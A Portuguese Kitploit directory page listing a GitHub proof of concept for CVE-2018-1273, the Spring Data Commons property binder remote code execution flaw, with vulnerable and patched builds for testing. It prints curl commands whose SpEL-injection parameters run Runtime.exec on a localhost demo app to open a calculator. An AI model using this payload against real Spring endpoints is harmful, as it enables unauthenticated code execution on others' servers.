Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/hdgokani/cve-2018-1273
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubhdgokani/cve-2018-1273

CVE-2018-1273

PoC para CVE-2018-1273: RCE do property binder do Spring Data Commons via parâmetros de solicitação maliciosos contra endpoints REST. Inclui versões vulneráveis e corrigidas para teste.

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2018-1273

Spring Data Commons, versões de 1.13 a 1.13.10, de 2.0 a 2.0.5, e versões antigas sem suporte, contêm uma vulnerabilidade no property binder causada pela neutralização inadequada de elementos especiais. Um usuário malicioso remoto não autenticado (ou atacante) pode fornecer parâmetros de requisição especialmente elaborados contra recursos HTTP suportados pelo Spring Data REST ou usar a vinculação de payload de requisição baseada em projeção do Spring Data, que pode levar a um ataque de execução remota de código.

Mais informações aqui

Executando

A aplicação pode ser testada com a versão vulnerável ou com a versão corrigida do Spring Data Commons.

  • Versão vulnerável (por padrão):
root@kitploit:~
mvn spring-boot:run
  • Versão corrigida:
root@kitploit:~
mvn spring-boot:run -Dfixed

Testando a vulnerabilidade

Execute o seguinte comando para verificar se a vulnerabilidade pode ser explorada:

  • No Windows:
root@kitploit:~
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('calc.exe')]=123"

  • No MacOs:
root@kitploit:~
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('/Applications/Calculator.app/Contents/MacOS/Calculator')]=test"

Créditos

Criado por https://www.arima.eu

ARIMA Software Design

Baixar ferramenta